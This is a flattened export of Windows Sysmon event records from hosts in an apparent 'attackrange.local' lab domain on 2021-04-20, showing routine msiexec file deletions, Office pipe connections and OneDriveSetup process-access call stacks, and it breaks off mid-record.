14:58:05.076{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000077928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.045{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\inprogressinstallinfo.ipiMD5=FC617AB204CE0FEDB7CD7F0CEAEF5757,SHA256=5BDE9F101976D8FD974F178994C76BE6D53B18012E8828081AC798A8FFE04887,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000077927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.045{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFF21E2C07117CF6FF.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000077926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.045{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF7395EAC97271FFE4.TMPMD5=FC617AB204CE0FEDB7CD7F0CEAEF5757,SHA256=5BDE9F101976D8FD974F178994C76BE6D53B18012E8828081AC798A8FFE04887,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000077925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.029{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFF1E0C07A34BD65E0.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000077924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.029{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFA7B19C5306BDFEE5.TMPMD5=FC617AB204CE0FEDB7CD7F0CEAEF5757,SHA256=5BDE9F101976D8FD974F178994C76BE6D53B18012E8828081AC798A8FFE04887,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000077923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.029{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF584E8B96A365C4CB.TMPMD5=B0C55484184A6AE23C1A05A8FFEA827A,SHA256=AE0C72032C50256F440E2563AF1F7A5C0A7F78F3E53AF7A48E2FB1B9310B260F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000077922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.014{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d08297.rbsMD5=D532D601FE8563BD3AA71D7220A06774,SHA256=0C58857FEBE3D539E62F4DEDF1D3F51B54ECEBD4ADF8250FE48905FFC636737B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000077921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.014{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI6E5B.tmpMD5=FCCDC45CA17E5180B40EFC28052BAC39,SHA256=4AB37B0F9C5FE3505E1ECFE0764AAA04838CF81F9E0A402425E057F7A251E621,IMPHASH=620AD7AB8901854C91622E052544AEE7truetrue 23542300x800000000000000077920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.998{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI6E5A.tmpMD5=FCCDC45CA17E5180B40EFC28052BAC39,SHA256=4AB37B0F9C5FE3505E1ECFE0764AAA04838CF81F9E0A402425E057F7A251E621,IMPHASH=620AD7AB8901854C91622E052544AEE7truetrue 18141800x800000000000000077919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000050470Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:05.322{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D48ADFDE94F78E64CD5C87FC2CE90745,SHA256=C24EF1A2A043462BF78EF60B397D060FC35886AE068288C438FD62041883474A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000078226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.967{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBFE-607E-220E-00000000BB01}6244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.935{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.873{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BIT75AA.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000078223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.873{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x800000000000000078222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.873{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b21c(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a27d|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a167|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+5feaa|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+67b89 10341000x800000000000000078220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b14f(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a27d|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a167|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+5feaa|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+67b89 10341000x800000000000000078219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b13a(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a 10341000x800000000000000078218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b13a(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a27d 10341000x800000000000000078217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b21c(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a27d|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a167|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+5feaa|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+67b89 10341000x800000000000000078216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b14f(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a27d|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a167|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+5feaa|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+67b89 10341000x800000000000000078215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b13a(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a 10341000x800000000000000078214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b13a(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a27d 10341000x800000000000000078213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b21c(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a27d|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a167|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+5feaa|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+67b89 10341000x800000000000000078212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b14f(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a27d|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a167|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+5feaa|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+67b89 10341000x800000000000000078211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b13a(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a 10341000x800000000000000078210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft 